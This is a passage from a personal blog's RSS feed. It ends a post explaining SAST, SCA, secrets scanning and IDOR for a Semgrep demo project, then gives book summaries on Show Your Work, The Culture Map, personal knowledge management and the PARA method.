<p>Source code is parsed into an AST — an Abstract Syntax Tree. This is the source code broken apart into a tree of operators, assignments, function calls, and conditions that the tool can reason about structurally. Unlike raw text search, the AST represents what the code means, not just what it says.</p>
<p>Control flow analysis maps all the paths the code can take — branches, loops, function calls. Code rarely runs straight from top to bottom. It splits based on conditions, repeats in loops, jumps to functions and returns. SAST builds a map of every possible execution path.</p>
<p>Taint tracking then follows untrusted data — input from a user — along every one of those paths. The data enters at a source (a form field, a URL parameter, a cookie). The tool traces every variable it touches, every function it passes through, every transformation applied to it. If it reaches a sink — a database query, a shell command, a rendered HTML page — without being sanitized first, that path is a vulnerability. The finding is reported with the exact file and line number where the taint reaches the sink.</p>
<p>SCA — Software Composition Analysis</p>
<p>Modern applications are mostly code other people wrote. Your dependencies — the packages in requirements.txt, package.json, pom.xml — can easily represent 99% of what's actually running. SCA is focused entirely on that layer.</p>
<p>SCA reads your manifest files, resolves the full dependency tree including transitive dependencies (packages your packages depend on), and checks every package and version against large databases of known vulnerabilities. Each known vulnerability has a CVE identifier, a severity score, affected versions, and a fixed version.</p>
<p>SCA tools also check license types across the dependency tree — a GPL-licensed package in a commercial product can create legal exposure that has nothing to do with security. And SCA tools generate SBOMs — Software Bills of Materials — a machine-readable inventory of every component in your software with its version, license, and source. When a critical CVE drops, an SBOM lets you query instantly whether your product is affected, rather than manually checking every codebase.</p>
<p>Secrets Scanning</p>
<p>Credentials, API keys, tokens, and private keys accidentally committed to source code are one of the most common causes of breaches. Secrets scanning detects these by pattern matching against known formats — AWS keys follow a specific pattern, GitHub tokens have a recognisable prefix, private keys have a standard header — and by entropy analysis, flagging strings that are long and random-looking enough to be a real credential.</p>
<p>The limitation, as this project discovered firsthand, is that generic strings like "admin123" or "supersecretkey123" don't match known patterns and have low entropy. They require custom rules written for your specific codebase.</p>
<p>Shift-Left</p>
<p>The software delivery lifecycle runs roughly: Design, Code, Build, Test, Staging, Release, Production. Traditionally, security checkpoints lived near the right end of that line — pre-production reviews, penetration testing before release, security audits on finished software.</p>
<p>The shift-left philosophy moves security as far left as possible — ideally to the moment a developer writes the code. The reasoning is economic as much as technical: a vulnerability caught while the developer is still writing the code takes minutes to fix. The same vulnerability caught in a pre-production audit takes days. Caught in production after an incident, it can take weeks and cost significantly more in remediation, reputation, and regulatory exposure.</p>
<p>Semgrep is built for the left side of that line. It runs in seconds, integrates into CI/CD pipelines, and surfaces findings as inline comments on pull requests while the developer still has context. Checkmarx, by contrast, is built more toward the middle and right — deep comprehensive scans run nightly or weekly, reviewed by dedicated security teams, used for compliance reporting and formal sign-off.</p>
<p>Neither replaces the other. Semgrep catches the majority of issues fast and cheaply. Deeper tools catch the subtle cross-file flows and complex logic that fast scanners miss. A mature security program uses both.</p>
<p>IDOR — Insecure Direct Object Reference</p>
<p>Think of it this way: you are authorised to borrow a book from the library. But the librarian doesn't check which book — they just let you in. You can now take any book, or all of them.</p>
<p>In web applications, this means the app checks that you are logged in but never checks whether the specific resource you are requesting belongs to you. Your account is at /account/1. An attacker changes the URL to /account/2 and sees someone else's account. The app authenticated the user correctly. It never authorised which data that user is allowed to see. The fix is a single additional condition in the database query — fetch this account only if it belongs to the currently authenticated user.</p>
<h3>RUNNING IT YOURSELF</h3>
<p>Everything is in the repository. You need Docker, Python 3, and a free Semgrep account.</p>
<p>git clone <a href="https://github.com/PrakyathReddy/VulnBank-Semgrep">https://github.com/PrakyathReddy/VulnBank-Semgrep</a> cd VulnBank-Semgrep pip install -r requirements.txt python <a href="http://app.py">app.py</a></p>
<p>The app runs on localhost:5000. Demo credentials are in the README.</p>
<p>For the Jenkins pipeline, the README includes the exact Docker commands to get Jenkins running and connected to the repo.</p>
<p>Full project: <a href="https://github.com/PrakyathReddy/VulnBank-Semgrep">https://github.com/PrakyathReddy/VulnBank-Semgrep</a></p>
<h3>CLOSING THOUGHT</h3>
<p>Security tooling only works if developers trust it and act on it. A tool that takes two hours to scan and produces eight hundred findings will be ignored. A tool that takes thirty seconds, produces four precise findings with line numbers and fix suggestions, and blocks the build — that gets fixed.</p>
<p>The shift-left movement is not really about tools. It is about putting security feedback at the moment when a developer can most easily act on it: while they are still thinking about that code, before the PR is merged, before the deploy happens.</p>
<p>VulnBank makes that concrete. The code is bad, the tests pass, the pipeline catches it, the deploy is blocked. That sequence — visible, automated, fast — is what good security tooling looks like in practice.</p>
]]></content:encoded></item><item><title><![CDATA[Stop Hiding Your Work: What I Learned from Austin Kleon's Show Your Work]]></title><description><![CDATA[Most of us wait. We wait until the project is done, until the portfolio is polished, until we feel "ready." And then we wonder why nobody knows what we do.
Austin Kleon's Show Your Work changed the wa]]></description><link>https://blog.prakyath.dev/stop-hiding-your-work-what-i-learned-from-austin-kleon-s-show-your-work</link><guid isPermaLink="true">https://blog.prakyath.dev/stop-hiding-your-work-what-i-learned-from-austin-kleon-s-show-your-work</guid><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Thu, 05 Mar 2026 17:20:57 GMT</pubDate><content:encoded><![CDATA[<p>Most of us wait. We wait until the project is done, until the portfolio is polished, until we feel "ready." And then we wonder why nobody knows what we do.</p>
<p>Austin Kleon's <em>Show Your Work</em> changed the way I think about creative visibility. It's not a book about self-promotion — it's a book about generosity, connection, and the quiet discipline of sharing what you're learning. Here are the ideas that stuck with me the most.</p>
<h2>You Don't Have to Be an Expert</h2>
<p>There's a beautiful concept in the book called <strong>scenius</strong> — the idea that creativity doesn't happen in isolation. It happens in communities of people who are learning from each other, borrowing ideas, remixing, and building something none of them could have built alone. Nobody in the group needs to be a genius. The magic is in the exchange.</p>
<p>This is liberating. It means you don't have to wait until you've "arrived" to start contributing. Make a commitment to learn in public. Share your journey, not just your destination.</p>
<h2>Share the Process, Not Just the Product</h2>
<p>We're trained to present finished work. But people connect with process. When you share your sources of inspiration, the messy middle, the challenges you're working through — you become relatable. You become human. And that's far more compelling than a polished case study.</p>
<p>Think of it in three stages. Early on, talk about what's inspiring you and what you're exploring. In the middle, share your methods and progress. At the end, reflect on outcomes and lessons learned. This kind of ongoing narrative is worth more than any résumé, because it shows people what you're working on <em>right now</em>.</p>
<h2>The Daily Practice</h2>
<p>Here's the simple discipline: once a day, before bed, look through what you've documented and share something from it. It doesn't have to be groundbreaking. It just has to be consistent.</p>
<p>But before you hit publish, ask yourself two questions: <em>So what?</em> and <em>Is this useful to my reader?</em> If the answer to either is "not really," hold it back. Generosity isn't the same as oversharing.</p>
<h2>Think in Flow and Stock</h2>
<p>Not everything you share carries the same weight, and that's fine. <strong>Flow</strong> is the daily stream — updates, observations, small insights. It keeps you visible and in rhythm. <strong>Stock</strong> is the stuff that lasts — the post someone bookmarks, the essay that's still relevant two months later. The beautiful thing is that stock often evolves from flow. Today's quick observation can become next month's best piece.</p>
<h2>Own Your Space</h2>
<p>Platforms come and go. Remember Myspace? Buy a domain with your name on it and build there. LinkedIn, Instagram, and whatever comes next are rented land. Your own site is home.</p>
<h2>Teach Everything You Know</h2>
<p>This one is counterintuitive. Won't sharing your secrets help your competition? In practice, no. When you teach openly, people feel like they were part of your journey. They root for you. They trust you. Hoarding knowledge creates distance; sharing it builds community.</p>
<h2>Tell Better Stories</h2>
<p>Here's something worth sitting with: how people <em>feel</em> about your work depends entirely on the story you tell them about it. And how they feel about it determines its value. A story is a lens — it frames perception. Learn to tell good ones, and your work will speak louder.</p>
<h2>Be a Member Before You're a Leader</h2>
<p>Want people to listen to you? Start by listening to them. The best way to lead a community is to first be a genuinely great member of one. Be curious. Be generous. Be present.</p>
<p>And if you want followers, the recipe is deceptively simple: be someone worth following. Be interested in things, and you'll become interesting.</p>
<h2>Find Your Tribe</h2>
<p>The whole act of putting your work out there is really about discovery — finding the people who think the way you do, care about the things you care about, and are building in the same direction. Be thoughtful about <em>where</em> you look. The right room matters more than the biggest room.</p>
<h2>Play the Long Game</h2>
<p>As your work gets more visible, criticism will come. That's the deal. Toughen up, learn to roll with it, and resist the urge to overthink every negative comment.</p>
<p>Keep showing up. Collect emails. Help others freely. Share valuable things without expecting a return. You'll get what you want if you stick around long enough — just don't quit too early.</p>
<p>And when you finally feel like you've mastered something? When the learning slows down and the spark fades? That's not the end. That's your cue to move on, become a beginner again, and start the whole beautiful cycle over.</p>
<hr />
<p><em>Inspired by Show Your Work! by Austin Kleon. If these ideas resonate, I'd highly recommend picking up the book — it's a short, energizing read that might just change how you think about sharing your craft.</em></p>
]]></content:encoded></item><item><title><![CDATA[What "The Culture Map" Taught Me About Working Across Borders]]></title><description><![CDATA[I recently read Erin Meyer's The Culture Map, and it fundamentally changed how I think about cross-cultural collaboration. If you work with international teams — or plan to — this book is essential re]]></description><link>https://blog.prakyath.dev/what-the-culture-map-taught-me-about-working-across-borders</link><guid isPermaLink="true">https://blog.prakyath.dev/what-the-culture-map-taught-me-about-working-across-borders</guid><category><![CDATA[culturemap]]></category><category><![CDATA[book summary]]></category><category><![CDATA[notes]]></category><category><![CDATA[Culture]]></category><category><![CDATA[internationalteams]]></category><category><![CDATA[cross cultural teams]]></category><category><![CDATA[Devops]]></category><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Thu, 05 Mar 2026 08:28:34 GMT</pubDate><content:encoded><![CDATA[<p>I recently read Erin Meyer's <em>The Culture Map</em>, and it fundamentally changed how I think about cross-cultural collaboration. If you work with international teams — or plan to — this book is essential reading. Here's what stuck with me.</p>
<h2>The Core Problem</h2>
<p>Most of us try to resolve cross-cultural friction by focusing on individuals. "Oh, that's just how Raj is," or "Sarah's always blunt like that." But culture operates at a level deeper than personality. It shapes how we perceive, think, and act — often without us realizing it. When we mistake cultural patterns for personal quirks, misunderstandings pile up fast.</p>
<p>Meyer's insight is simple but powerful: before you can work effectively across cultures, you need a framework to decode those differences. That framework is her <strong>eight-scale model</strong>.</p>
<h2>The Eight Scales</h2>
<p>Meyer maps cultural differences along eight dimensions, each a spectrum between two extremes:</p>
<ol>
<li><p><strong>Communicating</strong> — Low-context (explicit, literal) vs. High-context (implicit, layered with subtext)</p>
</li>
<li><p><strong>Evaluating</strong> — Direct negative feedback vs. Indirect negative feedback</p>
</li>
<li><p><strong>Persuading</strong> — Principles-first (build the theory, then conclude) vs. Applications-first (lead with the result)</p>
</li>
<li><p><strong>Leading</strong> — Egalitarian vs. Hierarchical</p>
</li>
<li><p><strong>Deciding</strong> — Consensual vs. Top-down</p>
</li>
<li><p><strong>Trusting</strong> — Task-based (earned through competence) vs. Relationship-based (earned through personal bonds)</p>
</li>
<li><p><strong>Disagreeing</strong> — Confrontational vs. Avoids confrontation</p>
</li>
<li><p><strong>Scheduling</strong> — Linear-time (strict adherence to schedules) vs. Flexible-time</p>
</li>
</ol>
<p>Here's an example of a culture map comparing Israel and Russia across all eight scales. Notice how two countries can diverge sharply on some dimensions while sitting close together on others:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/5d193180-e7aa-4f83-8eaa-c6da277df503.png" alt="" style="display:block;margin:0 auto" />

<p>Every culture lands somewhere on each of these scales. The key is that <strong>it's always relative</strong>. Indians might seem disorganized compared to the French, but to a German, the French seem just as chaotic. There are no absolutes — only positions relative to your own starting point.</p>
<p>Within any country, there's still a bell curve of individual variation. Culture gives you the center of that distribution, not a rigid rule:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/20341e89-085e-4c83-8ed3-88240f0413ba.png" alt="" style="display:block;margin:0 auto" />

<p>Culture and personality go hand in hand. There's a range of behaviors considered "normal" within any culture, and these ranges can overlap across countries. The Dutch and British ranges on the feedback scale, for example, overlap in the middle — meaning some Brits are more direct than some Dutch:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/0b6d1f15-a7c5-4ace-80c0-48d554d59108.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>Communicating: Say What You Mean (or Don't)</h2>
<p>This scale hit home the hardest for me. Countries like India, China, Japan, and Indonesia are <strong>high-context</strong> cultures. We expect people to read between the lines, pick up on what's implied, and share a web of unspoken reference points.</p>
<p>The US and most Anglo-Saxon countries sit at the <strong>low-context</strong> end. Communication is explicit, literal, and direct. The burden of clarity falls on the speaker, not the listener. Americans try to eliminate any room for misinterpretation.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/fdf605e8-3321-460b-bd21-3520193fcfef.png" alt="" style="display:block;margin:0 auto" />

<p>Here's how this plays out in practice: in high-context Iran, if someone offers you food, you refuse twice before accepting — even if you're starving. In the US, you just say yes.</p>
<p>Or consider what happens when an American finishes a presentation and asks, "Any questions?" An Indian audience will often say, "No, it's clear" — even when it isn't. To an American, that confirmation is taken at face value. Confusion follows.</p>
<p><strong>What each side thinks of the other:</strong></p>
<ul>
<li><p>A low-context person perceives a high-context person as secretive, evasive, or just bad at communicating clearly.</p>
</li>
<li><p>A high-context person thinks a low-context person is patronizing — stating what should already be understood.</p>
</li>
</ul>
<p>The practical takeaway for anyone from a high-context culture working with Westerners: <strong>be transparent, be specific, be explicit.</strong> Don't assume anything is implied. Recap key points. Put things in writing. And if you don't understand something, say so directly rather than hinting at it politely.</p>
<p>Multi-cultural teams need low-context processes. The more low-context a culture, the more it gravitates toward written objectives, org charts, performance appraisals, and documented expectations — everything spelled out on paper.</p>
<hr />
<h2>Evaluating: The Feedback Minefield</h2>
<p>Americans wrap negative feedback in layers of positivity — the classic "three positives for every negative" approach. The French criticize passionately and rarely bother with praise. The Dutch are blunt and straightforward. The Japanese would never criticize someone openly, especially not in a group.</p>
<p>We need to learn to interpret feedback properly. The British are a special case — they chronically understate everything. This table is one of the most memorable parts of the book:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/70da8a96-a822-4bf8-9a5a-dffae0064401.png" alt="" style="display:block;margin:0 auto" />

<p>When a British manager says "quite good," they might mean "barely acceptable." Learning to decode these patterns can save you from serious misreads.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/93b4d1ed-da2f-487a-8b29-49c00d82c2cb.png" alt="" style="display:block;margin:0 auto" />

<p>What makes this tricky is that it <strong>doesn't always align with the communicating scale</strong>. Americans are low-context communicators (explicit and clear) but <em>indirect</em> when delivering criticism. The French are higher-context in general communication, but devastatingly <em>direct</em> with negative feedback.</p>
<p>This two-by-two quadrant captures the full picture:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/59aaf4bb-5c53-40fd-9d0f-830f38bbef52.png" alt="" style="display:block;margin:0 auto" />

<p>Countries in Quadrant D (high-context, indirect feedback) like Japan, China, and India require the most care — never give negative feedback in front of a group, always do it in private.</p>
<p>One important caution: <strong>don't try to overcorrect</strong>. If you're from an indirect culture, suddenly being blunt with a Dutch colleague can backfire. Adaptation should be gradual.</p>
<hr />
<h2>Persuading: Why vs. What</h2>
<p>This one surprised me. When an American presents an idea, they lead with the recommendation and the expected impact. Get to the point. <em>What</em> should we do, and <em>what happens</em> if we do it?</p>
<p>A German audience wants the opposite. Show me the methodology. Walk me through the reasoning. Explain the parameters. The conclusion should come <em>last</em>, as the logical endpoint of a rigorous process.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/4055d01a-e445-4368-9f5a-a5f81256a314.png" alt="" style="display:block;margin:0 auto" />

<p>Meyer frames this as <strong>principles-first</strong> (deductive) versus <strong>applications-first</strong> (inductive) reasoning:</p>
<ul>
<li><p><strong>Principles-first</strong>: A causes B, B causes C, therefore A causes C. Spend 80% of your time on the theory, 20% applying it. Understanding <em>why</em> matters deeply. Build your argument logically before concluding.</p>
</li>
<li><p><strong>Applications-first</strong>: Lead with the result. Spend 80% on practical application, 20% on underlying theory. <em>How</em> matters more than <em>why</em>. Shorter is sweeter.</p>
</li>
</ul>
<p>Asian cultures add another layer entirely: <strong>holistic thinking</strong>. Where Westerners tend to zoom in on the most important element (micro to macro), Asians often zoom out — looking at relationships, interconnections, and how a task fits within the broader picture (macro to micro).</p>
<hr />
<h2>Leading: Egalitarian vs. Hierarchical</h2>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/5dec318b-100a-499c-b91f-2831b4d6df63.png" alt="" style="display:block;margin:0 auto" />

<p>In <strong>egalitarian</strong> cultures (Denmark, Netherlands, Sweden), the boss is a facilitator among equals. Organizational structures are flat, and communication routinely skips hierarchical lines.</p>
<p>In <strong>hierarchical</strong> cultures (Japan, Korea, India, China), status matters. The best boss is a strong director who leads from the front. Organizational structures are multilayered and fixed, and communication follows set hierarchical lines.</p>
<p>In hierarchical cultures, leaders act like guardians who take care of their employees, and in return, employees are loyal and obedient. The burden of responsibility exists in both directions.</p>
<hr />
<h2>Deciding: Consensual vs. Top-Down</h2>
<p>Here's where the model gets counterintuitive. You might assume egalitarian cultures make decisions by consensus and hierarchical cultures use top-down decision-making. <strong>Not necessarily.</strong></p>
<p>American workplaces are relatively egalitarian — first names, open-door policies, casual dress. But decisions are often made quickly by individuals in charge, and those decisions are understood to be flexible and revisable. Speed matters more than buy-in. Meyer calls this "small-d" decision-making:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/0b20e9f8-16b9-45f9-96a5-2c62a4483d4d.png" alt="" style="display:block;margin:0 auto" />

<p>Germany is more hierarchical in its leadership style, but intensely <strong>consensus-driven</strong> when making decisions. Teams spend significant time discussing, debating, and aligning. But once a decision is made, it's <strong>final</strong>. No revisiting, no course corrections mid-stream. This is "big-D" Decision-making:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/17b1a056-b700-491d-b3fc-ec95c58d0d38.png" alt="" style="display:block;margin:0 auto" />

<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/fb22d110-6d51-4799-94e9-1b853355429f.png" alt="" style="display:block;margin:0 auto" />

<p>Japan takes this to an extreme: the most hierarchical leadership style in Meyer's model, combined with the deepest commitment to consensus. Through the <strong>ringi system</strong>, consensus builds from the bottom up — engineers agree, then low-level managers, then senior managers — until by the time a decision reaches the C-suite, it's essentially already been made. This is why it's nearly impossible to sway a Japanese decision once it reaches the top.</p>
<hr />
<h2>Trusting: Peaches and Coconuts</h2>
<p>Meyer draws a memorable distinction between two types of trust: <strong>cognitive</strong> (based on competence and reliability — from the head) and <strong>affective</strong> (based on personal connection and warmth — from the heart).</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/9f528b69-1bff-4c06-a441-e9337aa027d6.png" alt="" style="display:block;margin:0 auto" />

<p>Americans keep these sharply separated. They're friendly from the first handshake — warm, open, generous with smiles. But that friendliness isn't friendship. Meyer calls this a <strong>peach</strong> culture: soft and inviting on the outside, but hit a hard pit before long. They tend to put their best self forward and be careful not to reveal vulnerabilities — which can come across as performative or fake.</p>
<p>Many European cultures are the opposite — <strong>coconut</strong> cultures. The exterior is formal, even cold. But once you crack through, the relationships run deep and genuine.</p>
<p>The practical lesson: in relationship-based cultures, you socialize <em>before</em> getting down to business. When you move from the office to the pub, <strong>drop your professional guard</strong>. Be real, be vulnerable. Being guarded outside of work reads as inauthentic — and inauthenticity kills trust.</p>
<p>In many relationship-based cultures, the relationship <em>is</em> the contract.</p>
<hr />
<h2>Disagreeing: Debate vs. Face</h2>
<p>The French love a good argument. They'll debate passionately, even aggressively, and then go to lunch together as if nothing happened. Disagreement is intellectual, not personal.</p>
<p>In much of Asia, the calculus is different. Protecting someone's <strong>face</strong> — their dignity and public standing — often matters more than being right. Open confrontation risks embarrassment, and embarrassment damages relationships. In non-confrontational cultures, attacking an opinion is seen as attacking the person.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/5c9e3340-5aa9-4e61-a2d2-e51691fc666e.png" alt="" style="display:block;margin:0 auto" />

<p>An important nuance: <strong>confrontational doesn't necessarily mean emotionally expressive</strong>. Germans and Dutch are highly confrontational but emotionally restrained. Israelis and French are both confrontational <em>and</em> emotionally expressive. Meanwhile, countries like India and Saudi Arabia avoid confrontation but are still quite emotionally expressive:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/09990d9e-9af3-4d6d-9e99-07c002cf8195.png" alt="" style="display:block;margin:0 auto" />

<p>This creates very different meeting cultures:</p>
<ul>
<li><p><strong>American</strong>: Debate during the meeting itself and come to a decision.</p>
</li>
<li><p><strong>French</strong>: Discuss and debate various viewpoints — the meeting is for exploring ideas.</p>
</li>
<li><p><strong>Japanese/Chinese</strong>: The real discussion happens <em>before</em> the meeting, in side conversations and informal check-ins. The meeting itself is largely ceremonial — a space to formalize what's already been agreed upon.</p>
</li>
</ul>
<p>Useful language tips: in confrontational cultures, use <strong>upgraders</strong> (totally, absolutely, completely). In non-confrontational cultures, use <strong>downgraders</strong> (sort of, kind of, partly, perhaps).</p>
<hr />
<h2>Scheduling: Linear-Time vs. Flexible-Time</h2>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/29979bb6-6a98-43d7-b939-1e37903a2746.png" alt="" style="display:block;margin:0 auto" />

<p>In <strong>linear-time</strong> cultures (Germany, Japan, Switzerland), project steps are approached sequentially — one task at a time, no interruptions, strict adherence to deadlines. Punctuality and organization are paramount.</p>
<p>In <strong>flexible-time</strong> cultures (India, Nigeria, Saudi Arabia), things are more fluid. Multiple tasks are handled simultaneously, interruptions are accepted, and adaptability is valued over rigid planning.</p>
<hr />
<h2>Putting It All Together</h2>
<p>Here's a culture map comparing four countries across all eight scales. Notice how each country has a unique signature — and how two countries might be close on one dimension but far apart on another:</p>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/e83f0cfb-ec8a-4d0a-8bf9-2d0ce07e56e8.png" alt="" style="display:block;margin:0 auto" />

<h2>What I'm Taking Away</h2>
<p>Reading <em>The Culture Map</em> didn't give me a cheat sheet for every cross-cultural interaction. What it gave me was something more useful: <strong>a framework for noticing</strong>. Instead of attributing someone's behavior to their personality or assuming bad intent, I now ask myself where their culture might sit on these eight scales — and how that compares to my own defaults.</p>
<p>A few principles I'm trying to internalize:</p>
<p><strong>Differences are relative, not absolute.</strong> Don't label a culture as "direct" or "hierarchical" in isolation — only as more or less so <em>compared to your own</em>.</p>
<p><strong>Adaptation should be gradual.</strong> Overcorrecting or mimicking another culture can backfire spectacularly. Move slowly.</p>
<p><strong>Multi-cultural teams need low-context processes.</strong> When in doubt, be more explicit, put more in writing, and assume less shared context.</p>
<p><strong>Sometimes understanding is enough.</strong> Just recognizing that a behavior is cultural — that it's different, not wrong — can prevent a misunderstanding from becoming a conflict.</p>
<p>Style-switching across these dimensions is, as Meyer puts it, an essential skill for today's global worker. It's not about losing your cultural identity. It's about expanding your range.</p>
<hr />
<p><em>Based on my notes from</em> The Culture Map <em>by Erin Meyer.</em></p>
]]></content:encoded></item><item><title><![CDATA[How I Offloaded My Mental Clutter and Achieved Super Clarity]]></title><description><![CDATA[We consume A LOT of info everyday. But the reality is, our short term memory is very limited—we can only hold up to 7 items at a point of time.
If you've ever read an amazing book or taken a course, o]]></description><link>https://blog.prakyath.dev/how-i-offloaded-my-mental-clutter-and-achieved-super-clarity</link><guid isPermaLink="true">https://blog.prakyath.dev/how-i-offloaded-my-mental-clutter-and-achieved-super-clarity</guid><category><![CDATA[pkm]]></category><category><![CDATA[secondbrain]]></category><category><![CDATA[#toolsforthought]]></category><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Fri, 27 Feb 2026 03:17:19 GMT</pubDate><content:encoded><![CDATA[<p>We consume A LOT of info everyday. But the reality is, our short term memory is very limited—we can only hold up to 7 items at a point of time.</p>
<p>If you've ever read an amazing book or taken a course, only to completely forget the details a month later, you know this pain. As Tiago Forte puts it: <strong>The mind is for having ideas, not for storing them</strong>.</p>
<p>To fix this, I recently took a course by Mischa van den Berg, which inspired me to dive into three foundational books: <em>The PARA Method</em> and <em>Building a Second Brain</em> by Tiago Forte, and <em>How to Take Smart Notes</em> by Sönke Ahrens.</p>
<p>By combining the philosophies from these authors, I'm building a system to achieve super clarity of mind and ensure I never lose a good idea again. Here is how my new system works.</p>
<h3>1. The CODE Framework: Managing the Flow (Credit: <em>Building a Second Brain</em>)</h3>
<p>Tiago Forte introduces the <strong>CODE</strong> methodology to prevent digital hoarding and make your notes actually useful.</p>
<ul>
<li><p><strong>Capture:</strong> Keep what resonates, but only capture the important, "noteworthy" kind of ones so they don't end up spamming your notes.</p>
</li>
<li><p><strong>Organize:</strong> Information should be organized based on <em>how actionable it is</em>, not <em>what kind of information it is</em>. Don't organize stuff based on where they came from, rather where they are going i.e. the outcomes they will help you realise. <em>(Note: Forte's PARA method is the perfect folder structure for this step!).</em></p>
</li>
<li><p><strong>Distill:</strong> Distill your notes down to an essence so your future self can read one line and recall the concept. You can do this through progressive summarization: Captured notes -&gt; Bolded Passages -&gt; Highlighted passages -&gt; Executive summary.</p>
</li>
<li><p><strong>Express:</strong> Share your knowledge, ideas, or presentations with the world.</p>
</li>
</ul>
<h3>2. The Zettelkasten Method: Taking Smart Notes (Credit: <em>How to Take Smart Notes</em>)</h3>
<p>While CODE gives you the broad structure, Sönke Ahrens explains exactly <em>how</em> to write the notes using a "slip-box" or Zettelkasten method.</p>
<ul>
<li><p><strong>Fleeting notes:</strong> Just write down what's in your head in the inbox folder, without worrying about how, where or why.</p>
</li>
<li><p><strong>Literature notes:</strong> While reading, be extremely selective, avoid copy-pasting, and write on your own to force an understanding.</p>
</li>
<li><p><strong>Permanent notes:</strong> Think how the new info relates to your existing notes (does it contradict, correct, or support them?). Write exactly as you were writing for someone else - use full sentences and try to be precise.</p>
</li>
</ul>
<h3>3. The Power of Connecting (Bottom-Up vs. Top-Down)</h3>
<p>Both Ahrens and Forte emphasize building connections. The biggest mindset shift for me was moving from a top-down "planner" to a bottom-up "expert".</p>
<p>Usually, we plan an outline for a project and then look for data to support it, which makes us prone to confirmation bias. Instead, the bottom-up approach suggests we learn what interests us deeply, connect notes within our slip box, and let the project emerge naturally over time.</p>
<p>Our ability to remember things for the long term depend on how interconnected they are. When we bring diverse kinds of material in one place, we start identifying unusual connections and recognizing relationships, which make us creative.</p>
<h3>Secret Weapons for Daily Work</h3>
<p>I've also adopted a few incredible techniques from Forte's book to make executing my work completely frictionless:</p>
<ul>
<li><p><strong>The Hemingway Bridge:</strong> Before calling it a day on something you are working on, take a moment to note down what you'll be doing for the next day, or time you plan to resume working. This creates a bridge for the next day which makes it very easy to resume.</p>
</li>
<li><p><strong>Archipelago of Ideas:</strong> Divergently gather all the sources, points, etc., that form the backbone of your essay, presentation or deliverable. Once you achieve a critical mass of ideas, decisively switch over to Convergence mode and link them together in an order that makes sense.</p>
</li>
</ul>
<p>A good system of note taking will make me look well-prepared for any meeting I join or presentation I give. I highly recommend checking out Mischa's course and picking up these books if you want to stop relying on a fragile memory and start building a system that actually works.</p>
]]></content:encoded></item><item><title><![CDATA[The PARA Method - My Key Takeaways]]></title><description><![CDATA[If you are anything like me, your digital life often feels like a mix of vague long-term goals and a hoarding problem. We consume information, save PDFs, and bookmark articles, but we rarely use them.
I recently read The PARA Method by Tiago Forte, a...]]></description><link>https://blog.prakyath.dev/the-para-method-my-key-takeaways</link><guid isPermaLink="true">https://blog.prakyath.dev/the-para-method-my-key-takeaways</guid><category><![CDATA[book summary]]></category><category><![CDATA[Productivity]]></category><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Wed, 18 Feb 2026 11:50:28 GMT</pubDate><content:encoded><![CDATA[<p>If you are anything like me, your digital life often feels like a mix of vague long-term goals and a hoarding problem. We consume information, save PDFs, and bookmark articles, but we rarely <em>use</em> them.</p>
<p>I recently read <em>The PARA Method</em> by Tiago Forte, and it offered a solution that actually sticks. It isn't just about tidying up files; it's about organizing information for <strong>actionability</strong>.</p>
<p>Here is how the system works and the key habits I’m adopting to stop the digital clutter.</p>
<h4 id="heading-what-is-para">What is PARA?</h4>
<p>The system breaks everything down into four primary categories based on how actionable the information is right now:</p>
<ol>
<li><p><strong>Projects:</strong> Short-term efforts with a deadline (e.g., "Complete Website Redesign").</p>
</li>
<li><p><strong>Areas:</strong> Long-term responsibilities without a deadline (e.g., "Health," "Finances").</p>
</li>
<li><p><strong>Resources:</strong> Topics or interests that might be useful in the future (e.g., "Web Design," "Cooking").</p>
</li>
<li><p><strong>Archives:</strong> Inactive items from the other three categories.</p>
</li>
</ol>
<h4 id="heading-the-aha-moment-projects-vs-areas">The "Aha!" Moment: Projects vs. Areas</h4>
<p>The biggest takeaway for me was distinguishing between <strong>Projects</strong> and <strong>Areas</strong>. We often feel overwhelmed because we treat ongoing responsibilities (Areas) like they are tasks we can "finish." But you never "finish" Health or Finance.</p>
<ul>
<li><p><strong>Projects</strong> are concrete. They have boundaries and deadlines.</p>
</li>
<li><p><strong>Areas</strong> are the "hats you wear." They are the ongoing roles you maintain.</p>
</li>
</ul>
<p>By breaking vague goals down into specific projects, we ensure our daily work is actually aligned with our long-term goals.</p>
<h4 id="heading-the-flow-be-like-water">The Flow: Be Like Water</h4>
<p>A common mistake is thinking a file lives in one folder forever. PARA is designed to be fluid. Information should flow like water in a river.</p>
<p>Priorities change. If a "Resource" becomes relevant to a current task, move it to "Projects." When a project is done, move it to "Archives." The system is not rigid; it moves from <strong>more actionable</strong> to <strong>less actionable</strong> depending on what you are doing <em>right now</em>.</p>
<h4 id="heading-3-habits-to-make-it-stick">3 Habits to Make it Stick</h4>
<p>To keep the system from falling apart, Forte suggests three specific habits that I found really helpful:</p>
